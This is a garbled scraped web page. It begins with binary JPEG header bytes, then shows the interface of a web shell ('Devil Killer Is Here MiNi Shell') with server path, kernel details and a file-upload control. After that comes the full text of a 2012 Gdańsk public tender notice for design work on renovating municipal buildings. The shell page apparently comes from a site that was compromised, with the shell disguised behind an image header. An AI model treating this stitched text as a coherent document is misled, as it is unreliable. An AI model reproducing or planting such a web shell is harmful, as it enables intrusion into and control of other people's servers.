JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120329/72677-N-2012.html

<p class="kh_header"><b>Gdańsk: Wykonanie dokumentacji projektowej na przebudowę czterech budynków gminnych w obrębie cokołów i wejść do budynków przy ul. Aldony 7 i ul. Wajdeloty 4, 14, 20 w Gdańsku oraz na przebudowę lokali przy ul. Wajdeloty 21 i ul. Wajdeloty 14/2 z przeznaczeniem na cele społeczne w ramach projektu Rewitalizacji Dolnego Wrzeszcza oraz sprawowanie nadzorów autorskich nad robotami wykonywanymi według sporządzonej dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 72677 - 2012; data zamieszczenia: 29.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej na przebudowę czterech budynków gminnych w obrębie cokołów i wejść do budynków przy ul. Aldony 7 i ul. Wajdeloty 4, 14, 20 w Gdańsku oraz na przebudowę lokali przy ul. Wajdeloty 21 i ul. Wajdeloty 14/2 z przeznaczeniem na cele społeczne w ramach projektu Rewitalizacji Dolnego Wrzeszcza oraz sprawowanie nadzorów autorskich nad robotami wykonywanymi według sporządzonej dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: <br>
1.1. Wykonanie dokumentacji projektowej dla remontów obiektów przedstawionych w punktach A, B i C w następującym zakresie:<br>
a) Koncepcja przebudowy lokali musi być wykonana w minimum 3 wariantach. Wybrany wariant podlega zatwierdzeniu przez UM - Referat Rewitalizacji (dotyczy zmiany sposobu użytkowania lokali przy ul. Wajdeloty 21 i 14),<br>
b) uzyskania koniecznych warunków technicznych i uzgodnień od gestorów mediów i sieci uzbrojenia podziemnego niezbędne do prawidłowego wykonania zamówienia,<br>
c) uzyskania wszelkich materiałów, takich jak mapy do celów projektowych, badania geotechniczne, uzgodnienia, opinie, ekspertyzy, analizy, itp. niezbędne do prawidłowej realizacji zamówienia,<br>
d) dokumentacja projektowa, tj. projekty budowlane, projekty wykonawcze, projekty architektoniczno - konstrukcyjnego i niezbędne projekty branżowe remontów będzie wykonywana na podstawie zatwierdzonej koncepcji i  musi być wykonana zgodnie z:<br>
 - Ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2006 Nr 156, poz. 1118  z późn. zm),<br>
 - Ustawą Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (tekst jednolity Dz.U. z 2010 r. Nr 113 poz. 759 z późn. zm.), która określa, że dokumentacja projektowa winna uwzględniać jej przepisy w zakresie opisu przedmiotu zamówienia, w tym przypadku oznacza to, że opis przedmiotu zamówienia nie może być sporządzony w sposób, który mógłby utrudniać uczciwą konkurencję, np. poprzez wskazanie znaków towarowych, patentów lub w inny sposób wskazujący pochodzenie urządzeń, materiałów, itd. W związku z powyższym w dokumentacji nie wolno używać nazw własnych materiałów i urządzeń oraz nazw producentów dla proponowanych materiałów i urządzeń oraz takich opisów, które mogłyby jednoznacznie wskazywać producenta, natomiast materiały oraz urządzenia proponowane w dokumentacji należy opisywać parametrami technicznymi.<br>
 - Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz.U. Nr 202 poz. 2072 z późn. zm.),<br>
 - Rozporządzeniem Ministra Infrastruktury z dnia 03 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. Nr 120 poz.1133 z późn. zm.),<br>
 - Rozporządzenia Ministra Infrastruktury z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. Nr 43 poz. 430).<br>
W dokumentacji projektowej na stronie tytułowej, przekrojach i planach sytuacyjnych należy umieścić dane inwestora oraz wskazać na stronie tytułowej numery działek objętych opracowaniem.<br>
W projekcie budowlanym należy umieścić:<br>
 - wypisy i mapy z ewidencji gruntów,<br>
 - wykaz działek na których będą realizowane projektowane roboty wraz z wykazem nazw/nazwisk właścicieli z adresami,<br>
 - wykaz działek oraz wykaz nazwisk/nazw właścicieli z adresami - sąsiadujących z miejscem prowadzenia robót,<br>
 - informację dotyczącą bezpieczeństwa i ochrony zdrowia.<br>
Dokumentacja musi zawierać oświadczenie projektanta o kompletności dokumentacji i zgodności przedmiarów robót z rozwiązaniami technicznymi.<br>
Do projektów wykonawczych na zmianę sposobu użytkowania lokali należy załączyć koncepcję architektury wnętrz oraz elementów ruchomego wyposażenia wnętrz zawierające dyspozycje w skali dowolnej lecz umożliwiającej czytelność koncepcji uwzględniającej kolorystykę ścian, podłóg, usytuowanie wyposażenia wnętrz wraz z zestawieniem elementów wyposażenia określającym parametry: rodzaj, wielkość, materiał,, kolorystykę, ilość (dotyczy lokali przy ul. Wajdeloty 21 i 14),<br>
Dokumentacja musi być formalnie uzgodniona, między innymi z:<br>
 - Miejskim Konserwatorem Zabytków,<br>
 - Urzędem Miejskim w Gdańsku, Wydziałem Urbanistyki, Architektury i Ochrony Zabytków, Referatem Rewitalizacji,<br>
 - Gestorami sieci (o ile wynikają wymagania z zakresu prac projektowych)<br>
 - Zarządem Dróg i Zieleni w Gdańsku.<br>
Dokumentacja musi uzyskać uzgodnienie Zespołu Uzgodnienia Dokumentacji Projektowej w Gdańsku (w przypadku konieczności projektowania przyłączy).<br>
e) specyfikacje techniczne wykonania i odbioru robót budowlanych muszą być wykonane zgodnie z:<br>
 - Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz.U. Nr 202 poz. 2072 z późn. zm.),<br>
oraz spełniać następujące wymagania:<br>
 - specyfikacje muszą być wykonane dla wszystkich branż,<br>
 - celem specyfikacji jest jednoznaczne określenie przedmiotu robót objętych dokumentacją projektową i jej konkretnymi rozwiązaniami pod kątem wymagań jakościowych, materiałowych, sprzętu i maszyn niezbędnych lub zalecanych do wykonania robót, warunków i kolejności technologicznej wykonania robót, obmiarów robót i płatności za roboty,<br>
 - w specyfikacjach nie wolno używać nazw własnych materiałów i urządzeń oraz nazw producentów dla proponowanych materiałów i urządzeń oraz takich opisów, które mogłyby jednoznacznie wskazywać producenta, natomiast materiały oraz urządzenia proponowane w dokumentacji należy opisywać parametrami technicznymi,<br>
 - specyfikacje muszą być ściśle powiązane z przedmiarami robót, gdyż mają stanowić podstawę do sporządzenia przedmiarów robót i muszą zawierać określenie zakresu prac.<br>
f) przedmiary robót muszą być wykonane zgodnie z:<br>
 - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych (Dz.U. Nr 130 poz. 1389),<br>
oraz spełniać następujące wymagania:<br>
 - przedmiary robót winny stanowić opis robót w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości przedmiarowych robót podstawowych,<br>
 - ilości jednostek miary podane w przedmiarze powinny być wyliczone na podstawie rysunków w dokumentacji projektowej, wyłącznie w sposób zgodny z zasadami podanymi w specyfikacjach technicznych,<br>
 - przedmiary robót należy opracować odrębnie dla poszczególnych obiektów, branż i rodzajów robót oraz jako jednolitą całość dla poszczególnych zadań,<br>
 - przedmiary robót muszą obejmować zestawienie wszystkich robót i czynności wynikających z projektów oraz specyfikacji technicznych wykonania i odbioru robót.<br>
 - w przypadku opracowania przedmiarów robót dla przyłączy branż: elektryczna, wod.-kan., ciepłownicza, teletechniczna, sanitarna, gazowa, należy je wykonać z podziałem na płatników zgodnie z Ustawą z dnia 21.03.1985 r. o drogach publicznych (art. 32, art. 39),<br>
 - na podstawie przedmiaru robót sporządzany jest kosztorys inwestorski, a następnie będą wykonywane kosztorysy ofertowe wykonawców, w związku z powyższym w przedmiarach robót  nie wolno używać nazw własnych materiałów i urządzeń oraz nazw producentów dla proponowanych materiałów i urządzeń oraz takich opisów, które mogłyby jednoznacznie wskazywać producenta, natomiast materiały oraz urządzenia proponowane w dokumentacji należy opisywać parametrami technicznymi.<br>
g) kosztorysy inwestorskie remontu muszą być wykonana zgodnie z:<br>
 - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych (Dz.U. Nr 130 poz. 1389),<br>
oraz spełniać następujące wymagania:<br>
 - dostarczone przez zamawiającego założenia wyjściowe do kosztorysów inwestorskich będą podstawą do sporządzenia kosztorysów inwestorskich w poszczególnych branżach oraz zbiorczego zestawienia kosztów,<br>
 - kosztorysy inwestorskie muszą być sporządzone odrębnie dla poszczególnych obiektów, branż i rodzajów robót oraz gestorów sieci oraz zawierać zbiorcze zestawienie kosztów,<br>
 - założenia wyjściowe do kosztorysów inwestorskich zostały zawarte w załączniku nr 9 do siwz.<br>
h) charakterystykę energetyczną (dotyczy zmiany sposobu użytkowania lokali przy ul. Wajdeloty 21 i 14),<br>
i) przygotowanie wniosku do Wydziału Urbanistyki, Architektury i Ochrony Zabytków Urzędu Miejskiego w Gdańsku wraz z wszystkimi wymaganymi załącznikami umożliwiającego uzyskanie przez Zamawiającego decyzji pozwolenia na prowadzenie robót budowlanych oraz zmianę sposobu użytkowania lokali,<br>
j) Dokumentację projektową należy przekazać Zamawiającemu w następujących ilościach:<br>
 - Projekty budowlane - 7 egzemplarzy,<br>
 - Projekty wykonawcze - 5 egzemplarzy,<br>
 - Przedmiary robót - 4 egzemplarze,<br>
 - Kosztorysy inwestorskie - 4 egzemplarze,<br>
 - Specyfikacje techniczne - 4 egzemplarze,<br>
 - Pozostałe załączniki projektów budowlanych i wykonawczych takie jak: uzgodnienia, opinie, ekspertyzy, analizy, badania itp. - w ilościach zgodnych z ilością dokumentacji do których będą załączane.<br>
 k) Ponadto Zamawiającemu należy przekazać wersje elektroniczne na płycie CD-R w 3 egzemplarzach:<br>
 - opisy techniczne projektów wszystkich branż - format PDF i DOC,<br>
 - rysunki zamieszczone w projektach wszystkich branż - format DWG i PDF,<br>
 - plansze zbiorcze zamieszczone w projektach wszystkich branż - format DWG i PDF,<br>
 - specyfikacje techniczne wykonania i odbioru robót budowlanych - format PDF i DOC,<br>
 - przedmiary robót - format XLS i zapisane w programie kosztorysowym dostępnym na rynku polskim,<br>
 - kosztorysy inwestorskie - format XLS i zapisane w programie kosztorysowym dostępnym na rynku polskim,<br>
 - wszystkie dokumenty uzgadniające, decyzje, opinie itd. mają być zeskanowane w formacie PDF,<br>
 - Oświadczenie projektanta o kompletności dokumentacji i zgodności przedmiarów robót z rozwiązaniami technicznymi ma być zeskanowane w formacie PDF.<br>
1.2.Pełnienie nadzoru autorskiego w czasie realizacji robót stanowiących przedmiot opracowanej dokumentacji.<br>
Projektant sprawować będzie nadzór autorski w szczególności w zakresie:<br>
a) stwierdzanie w toku wykonywania robót budowlanych zgodności realizacji z dokumentacją projektową,<br>
b) wyjaśnianie wątpliwości dotyczących dokumentacji projektowej i zawartych w niej rozwiązań,<br>
c) uzgadnianie z Zamawiającym i Wykonawcą robót możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej, w odniesieniu do materiałów i konstrukcji oraz rozwiązań instalacyjnych,<br>
d) czuwanie, aby zakres wprowadzonych zmian nie spowodował istotnej zmiany do projektu budowlanego, wymagającej nowej rejestracji,<br>
e) uczestniczenie w komisjach i naradach technicznych organizowanych przez Zamawiającego, uczestnictwo w odbiorach robót zanikających oraz przy odbiorze końcowym, próbach instalacji, procedurach rozruchu itp.,<br>
f) ocena wyników szczegółowych badań materiałów i konstrukcji w zakresie zgodności z rozwiązaniami projektowymi, normami i innymi obowiązującymi przepisami,<br>
g) udział w czynnościach mających na celu doprowadzenie do uzyskania projektowych zdolności użytkowych poszczególnych obiektów budowlanych i całej inwestycji.<br>
Udokumentowanie aktualizacji rozwiązań projektowych wprowadzanych do dokumentacji projektowej w czasie wykonywania robót budowlanych, potwierdzających zgodę Projektanta na ich wprowadzenie, stanowić będą podpisane przez projektanta lub projektantów sprawujących nadzór autorski:<br>
a) zapisy na rysunkach wchodzących w skład dokumentacji projektowej,<br>
b) rysunki zamienne lub szkice, albo nowe projekty opatrzone datą, podpisem oraz informacją jaki element zastępują,<br>
c) wpisy do dziennika budowy,<br>
d) protokoły lub notatki służbowe podpisane przez Zamawiającego i Projektanta.<br>
Wynagrodzenie dotyczące pełnienia nadzorów autorskich będzie stanowiło 10% wartości oferty złożonej przez Wykonawcę i będzie rozliczane miesięcznie w okresie realizacji robót budowlanych objętych projektami proporcjonalnie do stanu ich zaawansowania, tylko w tych miesiącach, kiedy nadzory były realizowane.<br>
2. Ogólny zakres przedmiotu zamówienia, czyli dane ogólne wyjściowe do projektowania opisany jest w załączniku nr 1 do siwz - Dane ogólne - wyciąg ze Studium wykonalności projektu Rewitalizacji Dolnego Wrzeszcza w Gdańsku - realizowanego z finansowaniem z funduszy z Unii Europejskiej.<br>
A. wykonanie dokumentacji na przebudowę elementów 4 budynków gminnych przy ul. Wajdeloty 4, 14, 20 i przy ul. Aldony 7 przylegających bezpośrednio do remontowanych pasów drogowych ul. Wajdeloty i ul. Aldony objętych Programem Rewitalizacji Dolnego Wrzeszcza w Gdańsku.<br>
Dokumentacja winna obejmować wykonanie:<br>
 - izolacji pionowej i poziomej ścian fundamentowych frontowych (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony),<br>
 - ocieplenie ścian fundamentowych (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony)<br>
 - remont z przebudową, renowacją elementów wejściowych do budynków: schody, przedproża, portale, drzwi wejściowe do budynku z zapewnieniem dostępu dla osób niepełnosprawnych (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony),<br>
 - remont lub likwidację okienek i świetlików piwnicznych wraz z ich studzienkami (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony),<br>
 - instalacji odgromowych (z prowadzeniem na elewacji bezpośrednio przylegającej do ulicy Wajdeloty i Aldony).<br>
Podłączenie rur spustowych z budynków przewidziano do remontowanej sieci kanalizacji deszczowej w przebudowanych ulicach w dokumentacji opracowanej na zlecenie Zarządu Dróg i Zieleni.<br> 
Projekt budowlany winien zawierać orzeczenie o stanie technicznym ścian zewnętrznych, fundamentów budynku i elewacji w całości od strony ulicy Wajdeloty i ul. Aldony, projektowaną kolorystykę elewacji frontowej w całości.<br>
W kosztorysie inwestorskim i w przedmiarach robót należy wykazać podział kosztów i zakresów remontowych odrębnie w obrębie cokołu i dla remontu elewacji pozostałej ściany od strony ulicy.<br>
Dokumentacja projektowa musi być wykonana zgodnie z założeniami wyjściowymi przedstawionymi w załączniku nr 1A do siwz.<br>
W celu wykonania niezbędnych odkrywek we wskazanych przez projektanta miejscach należy skontaktować się z BOM-6 - ul. Batorego 12 z Działem Technicznym.<br>
Zarządcą budynków wspólnot mieszkaniowych sąsiadujących z budynkami gminnymi jest EUROFORMAT - Rejon 6 z siedzibą przy ul. Grażyny 10/1 w Gdańsku (tel. 58-344-03-80).<br>
Wymagane uzgodnienia dokumentacji projektowej z:<br>
a. projektantem, który na zlecenie EUROFORMATU tj. zarządcy wspólnot mieszkaniowych budynków przy ul. Wajdeloty 3, 19, 21,22 sąsiadujących z budynkami gminnymi opracował dokumentację remontów w obrębie cokołów w zakresie co do stosowanych materiałów i sposobu wykończenia i koloru elewacji na styku sąsiadujących nieruchomości,<br>
b. ZD i Z w zakresie projektowanych schodów wejściowych i pochylni oraz rzędnych nowej nawierzchni w pasach drogowych przy remontowanych budynkach oraz podłączenia rur spustowych kanalizacji deszczowej budynków do kanalizacji deszczowej w ulicy Wajdeloty i Aldony objętej rewitalizacją,<br>
c. Referatem Rewitalizacji - Urzędu Miejskiego Wydział Architektury i Ochrony Zabytków w przedmiocie uzyskania pisemnej akceptacji zakresów opracowania,<br> 
d. Miejskim Konserwatorem Zabytków w zakresie uzyskania pozytywnej opinii zastosowanych rozwiązań.<br>
Dane o budynkach:<br>
 - Wajdeloty 4 - kubatura 3.022,50 m3, 4 kondygnacje <br>
 - Wajdeloty 14 - kubatura 3.736,00 m3, 4 kondygnacje,<br>
 - Wajdeloty 20- kubatura 3.531,30 m3, 4 kondygnacje, ogrzewanie gazowe własna kotłownia gazowa<br>
 - Aldony 7 - kubatura 1.746,95 m3, 3 kondygnacje<br>
Dane wyjściowe do projektowania stanowią:<br>
 - założenia wyjściowe - załącznik nr 1A do siwz,<br>
 - plan sytuacyjny - załącznik nr 1/1 do siwz,<br>
 - kopia mapy zasadniczej do celów informacyjnych (obiekt przy ul. Aldony 7, Wajdeloty 4) - załącznik nr 2/1 do siwz,<br>
 - kopia mapy zasadniczej do celów informacyjnych (obiekt przy ul. Wajdeloty 14) - załącznik nr 3/1 do siwz,<br>
 - kopia mapy zasadniczej do celów informacyjnych (obiekt przy ul. Wajdeloty 20) - załącznik nr 4/1 do siwz,<br>
B. wykonanie dokumentacji na zmianę sposobu użytkowania gminnego lokalu użytkowego przy ul. Wajdeloty 21 na parterze budynku (dawniej sklep) o powierzchni użytkowej 80,39 m2 z przeznaczeniem na działalność Klubu Mieszkańca.<br>
 - budynek przy ulicy Wajdeloty 21 - budynek wspólnoty mieszkaniowej będącej w administracji firmy - EUROFORMAT Sp. z o.o.<br> 
Dokumentacja projektowa na zmianę sposobu użytkowania lokalu winna przewidywać przebudowę lokalu z dostosowaniem do działalności opisanej w Wytycznych UM WUAiOZ Referatu Rewitalizacji dla lokali użytkowych w Dolnym Wrzeszczu (załącznik nr 1B do siwz).<br>
Lokal powinien być dostosowany dla dostępu dla osób niepełnosprawnych.<br>
Ogrzewanie lokalu należy zaprojektować z instalacją z elektrycznym źródłem ciepła oraz zapewnieniem ciepłej wody użytkowej uwzględniając najkorzystniejsze rozwiązanie pod względem eksploatacyjnym, ekonomicznym oraz uwzględniającym stan techniczny istniejących instalacji wewnętrznych w budynku oraz stan przewodów kominowych.<br>
Należy przewidzieć liczniki dla lokalu na pomiar wszystkich mediów - wody, gazu, energii elektrycznej w obrębie lokalu lub poza lokalem za zgodą wspólnoty mieszkaniowej w celu zapewnienia niezależnego rozliczenia użytkownika lokalu z dostawcami mediów.<br>
Dokumentacja powinna zawierać opracowanie koncepcji architektury wnętrz oraz elementów ruchomego wyposażenia wnętrz zawierające dyspozycje w skali dowolnej lecz umożliwiającej czytelność koncepcji.<br>
Koncepcja jw. w minimum w 3 wariantach podlega zatwierdzeniu przez UM - Referat Rewitalizacji.<br>
Budynek nr 21 oraz teren przyległy do budynku jest własnością wspólnoty mieszkaniowej i wszelkie zmiany w obrębie części nieruchomości wspólnej (piwnice, klatka schodowa, wejście do budynku, grunt przyległy do budynku itp.) będą wymagały pozyskania zgody wspólnoty mieszkaniowej w formie uchwały.<br>
Wymagane uzgodnienia dokumentacji projektowej z:<br>
a. rzeczoznawcą ds. ppoż., bhp i sanepidem,<br>
b. dostawcami mediów - energii elektrycznej, gazu, wody,<br>
c. Referatem Rewitalizacji - Urzędu Miejskiego Wydział Architektury i Ochrony Zabytków w przedmiocie uzyskania pisemnej akceptacji zakresów opracowania,<br> 
d. wspólnotą mieszkaniową ul. Wajdeloty 21 za pośrednictwem zarządcy EUROFORMAT w zakresie zmian w części nieruchomości wspólnej w celu zapewnienia dostępu dla osób niepełnosprawnych do Klubu Mieszkańca,<br>
e. Miejskim Konserwatorem Zabytków w zakresie uzyskania pozytywnej opinii zastosowanych rozwiązań zapewniających dostęp dla osób niepełnosprawnych do Klubu  Mieszkańca.<br>
Dane wyjściowe do projektowania stanowią:<br>
 - Wytyczne do projektowania (dla lokalu przy ul. Wajdeloty 21) UM WUAiOZ - Referat Rewitalizacji dla lokali użytkowych w Dolnym Wrzeszczu - załącznik nr 1B do siwz;<br>
 - opis stanu technicznego lokalu - załącznik nr 1/2 do siwz,<br>
 - rzut lokalu - załącznik nr 2/2 do siwz,<br>
 - arkusz inwetaryzacyjny - załącznik nr 3/2 do siwz, <br>
 - protokół nr 366/2011 z okresowej kontroli przewodów kominowych z dnia 04.03.2011r. - załącznik nr  4/2 do siwz,<br>
 - pismo UM WUAiOZ z dnia 29.07.2011r. opinia miejskiego konserwatora zabytków - załącznik nr 5/2 do siwz,<br>
 - pismo UM WUAiOZ z dnia 04.01.2012r. zaświadczające o zgodności zamierzenia z planem miejscowym - załącznik nr 6/2 do siwz,<br>
 - kopia mapy zasadniczej do celów informacyjnych - załącznik nr 7/2 do siwz,<br>
 - warunki przyłączenia do sieci elektroenergetycznej Energi - Operator SA z dnia 17.02.2012 r. nr 12/R1/01743 - załącznik nr 8/2 do siwz.<br>
C. wykonanie dokumentacji na zmianę sposobu użytkowania lokalu gminnego nr 2 przy ul. Wajdeloty 14 na parterze budynku (lokal mieszkalny) o powierzchni użytkowej około 60 m2 z przeznaczeniem na działalność Klubu Młodego Wrzeszczaka.<br>
 - budynek gminny zarządzany przez BOM-6 z siedzibą przy ul. Batorego 12 w Gdańsku (tel. dział techniczny BOM-6: 58-341-17-13).<br>
Dokumentacja projektowa na zmianę sposobu użytkowania lokalu winna przewidywać przebudowę lokalu z dostosowaniem do działalności opisanej w Wytycznych UM WUAiOZ Referatu Rewitalizacji dla lokali użytkowych w Dolnym Wrzeszczu (załącznik nr 1C do siwz).<br>
Lokal powinien być dostosowany dla dostępu dla osób niepełnosprawnych.<br>
Ogrzewanie lokalu należy zaprojektować z instalacją z elektrycznym źródłem ciepła oraz zapewnieniem ciepłej wody użytkowej ze źródeł jw. uwzględniając najkorzystniejsze rozwiązanie pod względem eksploatacyjnym, ekonomicznym oraz uwzględniającym stan techniczny istniejących instalacji wewnętrznych w budynku oraz stan przewodów kominowych.<br>
Należy przewidzieć liczniki dla lokalu na pomiar wszystkich mediów - wody, gazu, energii elektrycznej w obrębie lokalu lub poza lokalem w celu zapewnienia niezależnego rozliczenia użytkownika lokalu z dostawcami mediów.<br>
Dokumentacja powinna zawierać opracowanie koncepcji architektury wnętrz oraz elementów ruchomego wyposażenia wnętrz zawierające dyspozycje w skali dowolnej lecz umożliwiającej czytelność koncepcji.<br>
Koncepcja jw. w minimum w 3 wariantach podlega zatwierdzeniu przez UM - Referat Rewitalizacji.<br>
Wymagane uzgodnienia dokumentacji projektowej z:<br>
a. rzeczoznawcą ds. ppoż., bhp i sanepidem,<br>
b. dostawcami mediów - energii elektrycznej, gazu, wody,<br>
c. Referatem Rewitalizacji - Urzędu Miejskiego Wydział Architektury i Ochrony Zabytków w przedmiocie uzyskania pisemnej akceptacji zakresów opracowania,<br> 
